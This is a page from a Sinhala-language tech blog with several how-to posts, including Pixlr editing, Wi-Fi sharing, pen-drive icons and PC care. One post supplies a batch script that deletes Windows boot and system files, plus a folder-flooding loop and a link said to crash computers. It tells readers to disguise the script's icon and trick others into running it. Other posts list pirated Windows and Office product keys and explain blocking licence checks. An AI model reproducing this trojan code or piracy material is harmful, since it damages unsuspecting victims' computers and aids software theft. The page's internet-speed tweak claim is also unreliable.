Thursday 9 January 2014

ONLINE ෆොටෝස් එඩිට් කරමු

ONLINE ෆොටෝස් එඩිට් කරමු



ඔන්න අදත් කුප්පියක් හලන්න යන්නේ.. ගොඩක් කට්ටිය ෆොටෝෂොප් දන්නේ නැතුව ෆොටෝ එකක එඩිට් කරගන්න බැරුව දුක් විදිනවා. එහෙම අයටනම් මේක ගොඩක් වටිනවා. මේක තනිකරම ෆොටෝෂොප් වගේමයි, Filters පවා තියනවා. වැඩේ පිළිවෙල ගැන හිතලා මම මේකේ Tools ටිකත් අදුන්වල දෙනවා.. එහෙනම් පහලම ඇති ලින්ක් එක. එකට ගියාම එන එකෙන් Open Pixlr Editor(Advanved) යන්න. ඊට පස්සේ මෙහෙම එයි.


ඕකෙන් ඔයාට ඕන විදිහට ඉමේජ් එකක්හරි අළුත් පිටුවක්හරි  ගන්නකො. මෙන්න මේ විදිහට එයි දැන්. අපි දැන් ඕකේ Tools ටිකයි එව්වගෙන් කරන වැඩ ටිකයි අදුරගමු.


Crop Tool
මේ ටූල් එකෙන් පුළුවන් ඔයාට ඕන දිග පළල දීල මුළු පින්තූරයම කපා ගන්න.

Move Tool
මේකෙන් කරන්නේ ඔයාට ඕනා ලේයර් එහෙට මෙහෙට කරගන්න එකයි.

Marquee Tool
මේක තියෙන්නේ පින්තූරයෙන් කොටසක් හතරැස්වට හරි රවුමට හරි සිලෙක්ට් කරගන්න එකයි.

Magic Wand Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ එකම පාට තියන තැන් ඔක්කොම එක පාරට සිලෙක්ට් කරගන්න එකයි. ටොලරන්ස් එක වැඩි කරගත්තම සිලෙක්ට් වෙන සංවේදීතාව වැඩී.

Pencil Tool
මේකෙන් පුළුවන් පැන්සලකින් අදින විදිහට ඇදගන්න.

Brush Tool
මේක තියෙන්නේ පාටකරගන්න.

Eraser Tool
මේක දන්නේ නැති කෙනෙක් නැහැනේ..

Paint Bucket Tool
මේකෙන් පුළුවන් ෆොටෝ එකට පාට දාගන්න

Gradient Tool
මේකෙන් කරන වැඩේ කරලම බලන්නකෝ. ග්රෙඩියන්ට් කරන එකයි වෙන්නේ.

Clone Stamp Tool
මේකෙන් පුළුවන් ෆොටෝ එකේ තියන පැච් අයින් කරගන්න. Ctrl එක ඔබාගෙන පාට හොදට තියන තැනක ක්ලික් කරලා පැච් එක තියන තැන ක්ලික් කරන්න. 

Colour Replacement Tool
මේකෙන් පුළුවන් ෆොටෝ එකේ ඕන තැනකට තමන්ට කැමති පාටක් ලස්සනට දාගන්න.

Drawing Tool
මේකෙන් කස්ටම් ශේප් එකක් ඇදගන්න පුළුවන්.

Blur Tool
මේකෙන් පුළුවන් ඔයාට ඕන තැනක් බොඳ කරගන්න.

Sharpen Tool
මේක තියෙන්නේ ඕන තැනක ශාප්නස් එක වැඩි කරගන්න.

Smudge Tool
මේකෙන් පුළුවන් පාට එහෙට මෙහෙට ඇදගන්න.

Sponge Tool
මේකෙන් පුළුවන් ෆොටෝ එක රීටච් කරගන්න. හරියට මේකප් කරනවා වගේ වැඩක්.

Dodge Tool
මේකෙන් ඕන තැනක අදුරු ගතිය අඩු කරලා එලියකරගන්න.

Burn Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ ඕන තැනක අදුරු ගතිය වැඩි කරන එක.

Red Eye Tool
මේ ටූල් එක වැදගත් වෙන්නේ ෆ්ලෑෂ් ලයිට් එක නිසා ඇස් රතු පාට වුන ෆොටෝ එකක ඇස් වල පාට හරිගස්සගන්න එකයි. ටූල් එක අරගෙන රතු පාර වෙලා තියන ඇස් උඩ ක්ලික් කලාම වැඩේ හරි.

Spot Heal Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ ඕන තැනකට ස්පොට් එකතු කරගන්න එකයි.

Bloat Tool
මේකෙන්  කරන්නේ ෆොටෝ එකේ ඕන තැනක් එලියට ඇදගන්න එකයි. මේකටයි ඊලග එකටයිනම් කට්ටිය ආස වෙයි.

Pinch Tool
මේකෙන් කරන්නේ ෆොටෝ එකේ ඕන තැනක් ඇතුලට ඔබනවා වගේ දෙයක්.

Colour Picker Tool
මේක තියෙන්නේ කොහෙහරි ඔයාට අවශ්‍ය පාටක් තියනවනම් මහන්සියක් නැතුව එකපාරම ඒක තෝරාගන්න එකයි.

Type Tool
මේකෙන් කරන්නේ ඔයාට ඕන ටෙක්ස්ට් එකක් ඇඩ් කරගන්න එකයි

Hand Tool
මේකෙන් කරන්නේ ලේයර් එකක් එහෙට මෙහෙට කරගන්න එකයි.

Zoom Tool
මේකෙන් පුළුවන් ඉමේජ් එක විශාලනය කරගන්න.

Set Main Colour Tool
මේක තියෙන්නේ ඕන පාට දෙන්නයි.

*තවත් වැදගත් කොටස් දෙකක් තියනවා. එකක් තමයි ෆිල්ටර්ස් අනික තමයි අජස්මන්ට්ස්... අජස්මන්ට්ස් වලින් ෆොටෝ එකේ තව ඇඩ්වාන්ස් සෙටින් හදන්න පුළුවන්. ෆිල්ටර්ස් හරියට ඩිසයින්කරණයේ හදවත වගේ. එක නිසා ෆිල්ටර්ස් මෙහෙම පෝස්ට් එකකින් කියන්න අමාරුයි. කරලම බලන්න. මොනවහරි දැනගන්න දෙයක් තියනවනම් පහලින් කමෙන්ට් කරන්න. නැත්තම් Skype වලින් මැසේජ් එකක දාන්න.
මේකට දෙවෙනි කුප්පියක් නොදා ඉන්නයි කල්පනාව. එත් ඉතින් ඔයාලට ගැටළු තියනවනම් ඒ ටික ඔක්කොම අල්ලලා තවත් කුප්පියක් දානවා.. එහෙනම් දැනට කුප්පිය ඉවරයි.

ඔබේ කාමරය WI-FI කලාපයක් කරගන්න

ඔබේ කාමරය WI-FI කලාපයක් කරගන්න



කොහොමද ඔයාගේ කාමරේ Wi-Fi Zone එකක් කරගන්න තියනවනම් නේද? ආව් ආව් කටට ආව හිනාව නේද? ඔව් ඔව් එක තමයි මේ කරන්න හදන්නේ. අයියෝ ගෙවන්න ඕනද දන්නේ නැහැ කියල හිතුනද? මොන පිස්සුද මේක අමු අමුවේම නොමිලේ දෙන්න යන්නේ. අපේ කොල්ලන්ට තියන ප්‍රශ්නයක් තමයි ලැප් එකක් තියනවා, ඩොන්ගල් එකක්, එහෙම නැත්තම් ටෙලිකොම් ලයින් එකක් තියනවා. එකෙන් කම්පියුටර් එකට ඉන්ටනෙට් තියනවා. එත් ෆෝන් එකක් හරි Tab එකක්හරි Ipad එකක්හරි තියනවා, එකේ Wi-Fi තියනවා එත් Wi-Fi සිග්නල් නැහැ. ඔන්න ඔය වගේ අයටනම් මේක තරම් වටිනා දෙයක් තවත් නැති වෙයි. Unlimit වයර්ලයින් තියන කට්ටියටනම් මේක දෙයියෙක්. හැබැයි මෙන්න මේ දේවල් තියෙන්න ඕනා..

1.Wi-Fi තියන ලැප් එකක්.
2.එහෙම නැතුව ඩෙස්ක්ටොප් එකකට නම් පොඩි Wi-Fi අඩප්ටරයක්.
එකනම් පේමන්ට් එකෙන් උනත් ගන්න පුළුවන්නේ.

මේකෙන් වෙන්නේ ඔයාලගේ දැනට තියන අන්තර්ජාල සම්බන්දතාව (බ්‍රෝඩ්බෑන්ඩ් හරි ඩොන්ගල් හරි)  ලැප් එකේ Wi-Fi වලින් හරි ඩෙස්ක්ටොප් එකේ Wi-Fi අඩප්ටරයෙන් හරි බෙදාහරින එක. ඒ කියන්නේ Share Over කරන එක. දැන් ටිකක් දැනුම තියන අය හිතයි යකෝ මේක Ad-Hoc නෙට්වර්ක් එකකින් කරන්න පුළුවන් නේ කියලා.. එත් යාලු Ad-Hoc එකකින් ඉන්ටර්නෙට් ශෙයා කරනවා කියන්නේ ටිකක් අමාරු වගේම හරිම කතන්දර වැඩක්නේ. මේකෙන් පුළුවන් හරිම ලේසියෙන් වගේම හරිම ආරක්ෂාකාරී විදිහට වැඩේ කරගන්න. පාස්වර්ඩ් එකක් එහෙම දැම්මම කොහොමද නේද ගතිය. එකත් තමන්ගේම නමින් තියන Wi-Fi කනෙක්ෂන් එකකට, ඔව් ඔව් Wi-Fi Zone එකට ඔයාට ඕන නමක් දෙන්න පුළුවන්. එහෙනම් වැඩේ කරලම බලන්නකෝ ගතිය කොහොමද කියලා.. බඩු පහල ඇති ගන්නකො. කුප්පියනම් ඉවරායි...



මෘදුකාංගය පහලින් බාගන්න..

HACK කරන එක රිදෙන්නම කරමු

HACK කරන එක රිදෙන්නම කරමු




මුලින්ම කියන්නම් මේ ලිපිය මම දෙන්නේ එක්කෙනෙක් මට දුන්න කින්ඩි ටෝක් එකකට රිප්ලයි විදිහට.. මිනිහා මට වයිරස් ගැන උගන්නන්න එනවා. හරි හරි.. කෝන්තර ඉවරයි.. වැඩේ පට්ටාන් ගම්මු..

                       "DO AT YOUR OWN RISK"

ඔක්කොටම කලින් දැක්ක නේද ඔය දිලිසි දිලිසි රතු අකුරින් තියන එක. හරි හරි එහෙනම් වැඩේ මෙහෙමයි. අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.


1. URL එකකින් සිස්ටම් එක Crash කරමු.

මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙත් පොඩි කුප්පියක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.
උදා:- Athwela.bat
ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.

සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..


3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top 

එහෙනම් අදට කුප්පිය ඉවරයි... තව ඉස්සරහට මේ වගේ දේවල් දෙන්නම්කො..

ලැප්ටොප්වල බැටරි ආයු කාලය වැඩි කරමු

ලැප්ටොප්වල බැටරි ආයු කාලය වැඩි කරමු




මුලින්ම කියන්නම් මේක 100%ක් ම සාර්ථක වෙන්නේ Samsung ලැප් වලට තමයි ඉතින්. මේක දාලම බලන්නකෝ කොහොමද වැඩ කියලා. මගෙත් යන්න ඔන්න මෙන්න තිබ්බ බැටරියක් ඕක දාලා යන්තම් බේරගත්තා. මේකෙන් වෙන්නේ AC පවර් එකෙන් හෝ Battery පවර් එකෙන් මැෂින් එක රන් වෙන වෙලාවට බැටරියට හානියක් නොවී බල කළමනාකරණය කරගන්න එකයි. මේක ගොඩක් වටිනා සොෆ්ට්වෙයා එකක්.. ඔයාගේ තියෙන්නෙත් Samsung ලැප් එකක් නම් වැඩේ ටක්කෙටම හරි කියලා හිතලා මේක කිසි කිසි ගාලා බාගන්න. 
එහෙනම්..
ඔබට ජය වේවා...

Battery Life Extender මෙතනින් බාගන්න

ඔයාලගේ PEN DRIVE එකේ අයිකන් එකට ඔයාගේ ෆොටෝ එක දාගන්න

ඔයාලගේ PEN DRIVE එකේ අයිකන් එකට ඔයාගේ ෆොටෝ එක දාගන්න




ඔන්න අදත් තවත් අලුත් කුප්පියක් අරගෙන ආවා.. වැඩේනම් දන්නවත් ඇති. ඒ උනාට වැඩක් කරනකොට එකේ අවසානේ ලෙසටම තියෙන්න ඕනනේ. ඒ වගේම පිළිවෙලක් තියෙන්නත් ඔන නේද? අන්න එක හින්දමයි මේ පොස්ට් එක දාන්න හිතුවේ. කුප්පිය සරලව හදුන්වන්නම් ඉස්සෙල්ලා. මේකේ තියෙන්නේ තමන් විසින්ම අයිකන් එකක් හදාගෙන තමන්ගේ Pen Drive එකට හෝ වෙනත් Removable Device එකකට දාගන්නේ කොහොමද කියල. ඕනනම් ඔයාගේ ෆොටෝ එකක්හරි දාගන්න පුළුවන්. මේ තියෙන්නේ මගේ පෙන් එකකට ඒ වගේ හදාගෙන දැම්ම අයිකන් එකක් 
වැඩේ මුල ඉදලම යමු නේද?

මුලින්ම ඔයාලට ඕන අයිකන් එක හදාගන්න Real World Icon Editor සොෆ්ට්වෙයාර් එක ගන්න(පොස්ට් එකේ පහලම ඇති ලින්ක් එක) සොෆ්ට්වෙයාර් එකක් කිව්වට මේක පොඩි සොෆ්ට් කෑල්ලක්. හැබැයි ට්‍රයල් එකක්, වැඩේ කරලා අයින් කරගන්න එකනේ. නැත්තම් ඕකේ ක්‍රැක් එක හොයාගන්නත් පුළුවන් නෙට් එකෙන්. හරි දැන් බඩු බාගත්තනේ. ඕපන් කරගන්නකො එහෙනම්. මෙන්න මෙහෙම එයි.



ඒකෙන් Open යන්න. දැන් ඩිරෙක්ට්‍රියෙන් ඔයාට අයිකන් එක හදන්න ඕන ෆොටෝ එක අරගන්න. දැන් ට්‍රාන්ස්ෆොමෙෂන් ටූල් එකෙන් අයිකන් එක ඕන විදිහට ෆොටෝ එක ක්රොප් කරගන්න. X අකුර ඔබපුවාම ටූල් එක එයි. පුළුවන් තරම් හරි හතරැස් විදිහට ක්රොප් කරගන්න. එතකොට තමා ලස්සනට අයිකන් එක ඩිස්ප්ලේ වෙන්නේ. දැන් එතන වැඩේ ඉවරයිනේ. දැන් Create Icon දෙන්න.



එතකොට ඔය පහල වගේ එකක් එයි. එතනින් 256x256 Pixels කියන එකට ටික් එකක දාලා අනිත් ඔක්කොම ටික් අයින් කරලා OK කරන්න. ඒක තමයි වැඩිම කොලිටි එක. ඕනනම් වෙනස් කරගන්නත් පුළුවන්. 



දැන් ආයෙත් X අකුර ඔබලා ඔය පහල තියනවා වගේ පොඩ්ඩක් ඇදලා කරලා හොදට හදාගන්න. 



දැන් File ගිහින් Save As දීලා නමක් එහෙම දීල ඕක සේව් කරගන්න. ආහ්හ්හ්හ්.. තව එකක්, නමට අන්තිමේ තියන .ico කියන එක වෙනස් කරන්න එපා.



ඇති යන්තම් දැන්නම් අයිකන් එක හදලා ඉවරයි. දැන් තියෙන්නේ ඒක USB Device එකේ ඩීෆෝල්ට් අයිකන් එක වෙනුවට අපි හදාගත්ත එක දාන එකයි. අයිකන් එකක් විතරක් හදාගන්න ඕන අයට මෙතනින් නවතින්න පුළුවන්... 

දැන් එහෙනම් Pen Drive එක එහෙම ගහන්නකෝ ..
Pen Drive එක ඇතුලට අපි අර හදාගත්ත අයිකන් එක කොපි පේස්ට් කරගන්න. දැන් Desktop එකේ හරි කොහේ හරි නෝට්පෑඩ් එකක් ඕපන් කරගන්න. Pen Drive එක ඇතුලෙනම් එපා. දැන් පහල පින්තූරය බලන්න.

ඒ තියන විදිහට නෝට්පෑඩ් එක ඇතුලේ කෝඩ් ටික ලියාගන්න. ඔය Athwela කියන එක වෙනුවට අපි Pen Drive එක ඇතුලට දාගත්ත අයිකන් ෆයිල් එකේ නේම් එක කැපිටල් සිම්පල් වරද්දන්නෙ නැතුව හරියටම දෙන්න. ආහ්හ්,, ඒකෙ අගට .ico කියල තියනවා දැක්ක නේද? ආ දැක්කනම් කමක් නැහැ ඒ විදිහටම ලියාගන්න. Name කියන එක වෙනුවට Pen Drive එකට දාන්න ඕන නේම් එක දෙන්න. හොදට බලන්න ඔය = දෙපැත්තේ හිස්තැන් තියන්න ඕනා. දැන්නම් අන්තිම හරියේ ඉන්නේ.. :D  ඊලගට අපි ඕක සේව් කරන්න ඕනා මෙන්න මෙහෙමයි. File ගිහින් Save As යන්න. දැන් ඕක සේව් වෙන්න ඕන තැන නේ අහන්නේ.. ලොකේෂන් එකට Pen Drive එක දෙන්න. දැන් File Name කියන එකට autorun.inf කියල දෙන්න. පහල රූපය බලන්න.

දැන් පෙන් එක ඇතුලේ තියනවා නේද අයිකන් ෆයිල් එකයි ඔටෝරන් ෆයිල් එකයි., ඒ දෙකම Right Click කරලා Properties ගිහින් Hidden කරගන්න. අප්පා ඇති යන්තම් වැඩේ ඉවරයි..... දැන් දෙපාරක් තුන්පාරක් පෙන් එක ගලවලා ගහලා බලන්න. දාපු පින්තූරය තියනවා නේද කිසි කිසි ගාලා මේ වගේ...

WINDOWS 8 PROFESSIONAL 64 BIT සංස්කරණය 100% නොමිලේ..

WINDOWS 8 PROFESSIONAL 64 BIT සංස්කරණය 100% නොමිලේ..




ඔන්න කාලයක් තිස්සේ හොයලා හොයලා ජනේල 8 Pro 64bit හොයාගත්තා. ඔන්න තියනවා සීරියල් නම්බර් තොගයක් ඇක්ටිවේට් කරගන්න ඔය එකක් දාලා. ඇක්ටිවේටර් එකත් තියනවා . *** දාල තියන දෙක ඉස්සෙල්ලම ට්‍රයි කරන්න.

NG4HW-VH26C-733KW-K6F98-J8CK4
XKY4K-2NRWR-8F6P2-448RF-CRYQH
NK9CK-978CT-FQ7F7-RC8FQ-488X2***
MPHYQ-6NDGH-KY23Q-T2TJF-HQR9Q
N3DBK-TT4QR-C3TWM-W6CGT-H8MQD
NW388-MFMCX-DRF3V-QXG72-DC73D
NY87D-VCK7D-WM77C-K77V8-RX49Q
PCMTP-7PNHM-JCBQF-DTYH6-TJCKQ
TP2X7-NQ2MR-WGJMG-XWB7K-WTV3D
YGB8N-6RFBV-6X3MG-J27FX-V2WXQ
VMNVQ-VH6XM-GCYW7-4X8VM-8FDG3***

හරි දැන් එකනම් හරි. අර ඩෙස්ක්ටොප් එකේ තියන වෝටමාක් ටික අයින් කරන විදිහ මම කලින් පොස්ට් එකක දැම්මා.. ඒක මෙතනින් බලන්න. 

එහෙනම් පහලින් තියනවා ජනේල 8 නොමිලේ බාගන්න ලින්ක් එක. 

මතක ඇතුව මේ ලිපියත් කියවලම ඉන්න. 

එහෙනම්..
ඔබට ජය වේවා..!!

සැ.යු.- මතක ඇතුව මේක DVD එකකට Burn කරලම බූට් කරලා ඉන්ස්ටෝල් කරන්න හොදද?

Windows 8 PRO 64Bit සංස්කරණ Free පහලින් බාගන්න.


ටොරන්ට් දන්නේ නැතිනම් මෙතනට යන්න.

100%ක් INTERNET SPEED එක සුපිරියට වැඩි කරගමු

100%ක් INTERNET SPEED එක සුපිරියට වැඩි කරගමු




මේකනම් සුප්පා වැඩක්. මම නිදාගන්න ගිහින් ඉද්දි මතක් වුන ගමන් තමයි ආයෙත් ඇහැරලා ඇවිත් මේ පෝස්ට් ඒක මේ ලියන්නේ.. 
මම දන්නවා ගොඩක් අය තමන්ගේ අන්තර්ජාල වේගය කොච්චර තිබ්බත් මදි කියලනේ හිතන්නේ. ඔයාලට කිව්වට මොකෝ 15.9MB/s තිබිලත් මට මදි කියල හිතෙනවනෙ. මොනවා කරන්නද ඕක ඉතින් අපේ හැටිනේ.. මමනම් සෙල්ලම දාල තියෙන්නේ.. දැන් මගේ අන්තර්ජාල පිරික්සුම් වේගය තිබ්බට වඩා හුගාක් වැඩි.. ඔයාල හැමෝම දන්නා දෙයක්නේ මේ SK ඉතින් තනියම කන කෙනෙක් නෙමෙයි කියලා.. ඔන්න ඉතින් මැද්දෙන් පණ්ඩිත වැකියකුත් දාල නේද? හික් හික්.. හරි හරි ඔන්න එහෙනම් වැඩේට බහිමු කෝලම් කරන ඒක නවත්තල.. 

කොටින්ම මමත් පුදුම වුනා මේ වැඩේ කලාට පස්සේ.. මම හිතනවා ඔයාලටත් මගේ ප්‍රතිපලයම හම්බවෙයි කියලා... එහෙනම් දෙයියෝ බුදුන් සිහිකරලා වැඩේ පට්ටාන් ගම්මු... ගුඩ් ලක්...

1.ඉස්සෙල්ලම ස්ටාට් ගිහින් gpedit.msc කියලා ටයිප් කරලා Local Group Policy Editor ඒක ගන්න..

2.දැන් ඒකෙ තියන වම් පැත්තේ මෙනුවෙන් Computer Configuration යටතේ තියන Administrative Templetes ක්ලික් කරන්න.

3.දැන් Network ක්ලික් කරන්න. ඒක යටතේ ආව ලිස්ට් එකෙන් Q0S Packet Scheduler කියන ඒක උඩ ඩබල් ක්ලික් කරන්න. පහල තියනවා ඔන්න බලන්නකෝ....



4.ඕක උඩ ඩබල් ක්ලික් කරහම එන ලිස්ට් එකෙන් Limit Reservable Bandwidth කියන එක උඩ ඩබල් ක්ලික් කරන්න.. දැන් මෙන්න මෙහෙම එකක් එයි..



5.දැන් ඔතන Not Configured කියලා තියන ඒක Enabled කියන එකට මාරු කරලා පහල Options වල 80%ක් විදිහට තියන Bandwidth Limit ඒක 0 ටම අඩු කරන්න. දැන් තේරෙනවා නේද කොච්චර වේගයක් කකාද ඉදල තියෙන්නේ කියලා කම්පියුටර් ඒක.. 

6.හරි එහෙනම් දැන් Apply කරලා OK කරන්න. ඊට පස්සේ කම්පියුටර් ඒක Restart කරන්න. පොඩ්ඩක් දැන් බලන්නකෝ එහෙනම් Internet Surfing Speed ඒක එහෙම.. පට්ට නේද? 

Microsoft Office 2010

Microsoft Office 2010

මයික්‍රොසොෆ්ට් සමාගමෙන් ලගදි නිකුත් කරපු Office පැකේජ් එක තමා Office 2010.එහි Office 2007 එකට වඩා හුගක් පහසුකම් තියෙනවා. නමුත් ලංකාවේ අපට ඔව්ව ගන්න කොහෙන්ද ඔච්චර සල්ලි. හරි කමක් නෑ, මෙන්න අපි අරගෙන ආව ඒ software එක ඔබට නොමිලේම.
ඉස්සෙල්ලම පහල ලින්කුවට ගිහින් software එක බාගන්න.
හරියටම හරි. Key එක ඉල්ලනකොට පහල තියෙන Keys වලින් එකක් දෙන්න.
VYBBJ-TRJPB-QFQRF-QFT4D-H3GVB
6BWCH-DPPVF-MYQ3P-FJPCV-Y494Y
828CH-G4FPY-HMH4R-32GCK-6D9BH
4DRT4-F2M76-3WDJB-XGTRR-QF8KH
6QFDX-PYH2G-PPYFD-C7RJM-BBKQ8
PYMDW-8DFY2-Y68BB-XHDGD-CT44

පරිගණකයේ ආයු කාලය වැඩි කරගනිමු!

පරිගණකයේ ආයු කාලය වැඩි කරගනිමු!

අපි කවුරුත් කැමතියි අපේ කොම් එක අවුලක් නැතුව ගොඩක් කල් පාවිච්චි කරන්න. ඒත් අපේ නොදන්නාකම නිසා අපේ කොම් එකේ ආයු කාලය සෑහෙන්න අඩු වෙනවා. ඉතින් මම කල්පනා කළා සොෆ්ට්වෙයාලන්තේ අපේ යාලුවන්ට කොම් එක වැඩි කාලයක් අප්සෙට් එකක් නැතිව පාවච්චි කරන්න පුංචි උපදෙස් ටිකක් දෙන්න.
අපේ කොම් එකේ Speed අඩු උණාම, නැත්නං නිතර නිතර Stuck වෙන්න පටන් ගත්තම කෝකටත් තෛලේ වගේ අපේ කස්ටිය කරන්නේ කොම් එක Format කරන එක. කොම් එක Slow වෙලා තියෙන්නේ Software Problem එකක් නිසා නම් එකෙන් බොහෝවිට අවුල නිරවුල් වෙනවා, ඒත් Hardware Problem එකක් නිසා අවුල් වුන කොම් එකක් ඒ ක්‍රමේට හදා ගන්න බැහැ.
Hardware Problem එකක් ආවම ඒකට විසඳුම් හොයන්න යනවට වඩා, Problem එකක් එන්නේ  නැති වෙන විදියට වැඩ කරන එක කෝකටත් හොඳයි. මෙන්න එහෙනං උපදෙස්.
1. කොම් එක කොච්චර Sure උනත්, අත්‍යාවශ්‍ය Files Backup කරලා තියාගන්න. ඔක්කොම නෙවෙයි, අත්‍යාවශ්‍ය Files ටික විතරක්. මෙන්න මේ Online Backup Services ඒකට හොඳයි.
2. “කෝ බලන්න AC රූම් එකක කොම් එක තියාගෙන ඉන්න අය?”
“ඔයාට මැලිබන් චොක්ලට් බිස්කට් එකක් දුන්නොත්………………………?”
මැලිබන්  චොක්ලට් බිස්කට් එකක් දුන්නත් AC රූම් එකක කොම් එක තියා ගන්නේ කොහොමද AC රූම් එකක් නැතුව?  ඔව්. අපෙන් බහුතරයක් දෙනා කොම් එක තියාගෙන ඉන්නේ AC රූම් එකක නෙවෙයි. එහෙම අය හැමෝම මාස 2-3 කට වතාවක් වත් කොම් එක (Casing)  ගලවලා ඇතුල සුද්ද කරන්න ඕනෑ. රෙදි කෑල්ලකින් ගහල දූවිලි අයින් කරන්න එහෙම හදන්න එපා. පොඩි, කෙඳි ගැලවෙන්නේ නැති Brush එකක් පාවිච්චි කරන්න. නැත්නම් Blower කෑන් එකක් පාවිච්චි කරන්න පුළුවන් නම් ගොඩක් හොඳයි. දූවිලි තියෙන එකේ භයානකකම තමයි කොම් එක රත්වෙන එක. කොම් එක රත්වෙනවා කියන්නේ ඇතුලේ තියෙන sensitive circuits damage වෙනවා කියන එක.
3. කොහොමද දැන ගන්නේ කොම් එක Overheat වෙනවා කියලා? අත තියල බලලනම් ඒක හොයනවා බොරු. කොම් එක overheat වෙන එකෙන් දරන්න බැරි පාඩු වෙන්න පුළුවන්. ගොඩක් වෙලාවට Overheat වෙන එකෙන් damage වෙන්නේ AMD ( Advanced Micro  Devices) වර්ගයේ ප්‍රොසෙසර් වලට. Intel වර්ගයේ  ප්‍රොසෙසර් වලට එහෙම වෙනවා අඩුයි. (එහෙම නොවෙනවා නෙවෙයි) කොම් එකේ උෂ්ණත්වය මනින්න පුළුවන් නියම Software එකක් තමයි SpeedFan කියන්නේ.
මේ සොෆ්ට්වෙයා එකෙන් machine එකේ හැම වැදගත් කොටසකම උෂ්ණත්වය Monitor කරනවා. උෂ්ණත්වය සීමාවට එහා ගියොත් Warning එකක් දෙනව. ඒක නිසා අපිට අපේ කොම් එකේ උෂ්ණත්වය ගැන බය වෙන්න දෙයක් නෑ. ( ඇයි, machine එකේ Fan හිටි හැටියේ වැඩ කළේ නැත්නම්, කොම් එකේ උෂ්ණත්වය වේගයෙන් වැඩි වෙනවනේ.) මේ සොෆ්ට්වෙයාර් එක ඒ ගැන බලාගනී. ඔයාල චුට්ටක් වත් බය වෙන්න ඕන නැහැ.
මේ උපදෙස් ඔයාලට වටීවි කියලා හිතනවා.  ඔයාලට බොහොම ස්තුතියි මේක කියෙව්වට.

හොර software එක මාට්ටු ද? මෙන්න විසඳුම!

හොර software එක මාට්ටු ද? මෙන්න විසඳුම!

මම කලින් blog post එකකින් ඔයාලට Bitdefender IS 2012 දුන්නනේ. හරි, අද මම කියන්න යන්නෙ ඒක පාවිච්චි කරලා  ඔයා Net Connect උණාම  softwares  හොර කියලා මාට්ටු වෙන එක නවත්තන්නේ කොහොමද කියලා. (Guard එක එහෙම නෙවෙයි හොඳේ!) වෙන ඒවා. කියවලම බලන්නකෝ.
1. ඉස්සෙල්ලම bitdefender 2012 Open කර ගන්න.
2.Settings tab එකට යන්න.
3. රූපයේ විදියට Firewall —— Advanced——-Application Rules යන්න.
4. ඒකෙන් Add Rules යන්න.
5. ඒකෙන් ඔයාලට Block කරන්න ඕන application ඒක browse  කරල තෝරාගන්න. (මේක ටිකක් අමාරුයි. සමහර softwares වල, internet connect වෙන්නේ වෙනම .exe file එකකින්. ඒක නිසා සැක  හිතෙන  ( eg: Update.exe කියලා එකක් තියෙනවනම් software එක හොර එකක් කියලා අහු වෙන්නේ ඒ application එක නිසා.) සැක හිතෙන application එක browse කරලා  තෝරාගන්න.
6. ඒක open කරන්න.
7. ඊතල ලකුණු වලින් පෙන්නලා තියෙන attributes දීල Deny කියලා තෝරලා OK කරන්න.
8. ඔන්න හරි. ඊළඟ සැරේ ඔයා net connect වෙනකොට software එක හොර කියලා අහු වෙන්නේ නෑ.
(දැනටමත් අහුවෙලා නම් net disconnect වෙලා සොෆ්ට්වෙයා එක activate කරලා මේ වැඩේ කරලා net connect වෙන්න.)

නොමිලේ Mouse Pad එකක් ගෙදරටම ගෙන්න ගමු!

නොමිලේ Mouse Pad එකක් ගෙදරටම ගෙන්න ගමු!

අද මම කියලා දෙන්නේ නොමිලේ මවුස් පෑඩ් එකක් ගෙදරට ම ගෙන්න ගන්න විදිහ.
1. මුලින්ම http://www.tomtop.com/  site එකට යන්න.
2. ඊට පස්සේ ඒ site එකේ register වෙන්න.
3. ඊට පස්සේ ඔයාගේ E-mail Address එකට Confirmation Link එකක් දේවි. ඒකට කොටන්න.
4. ඊට පස්සේ Registration Successful කියලා message එකක් එයි.
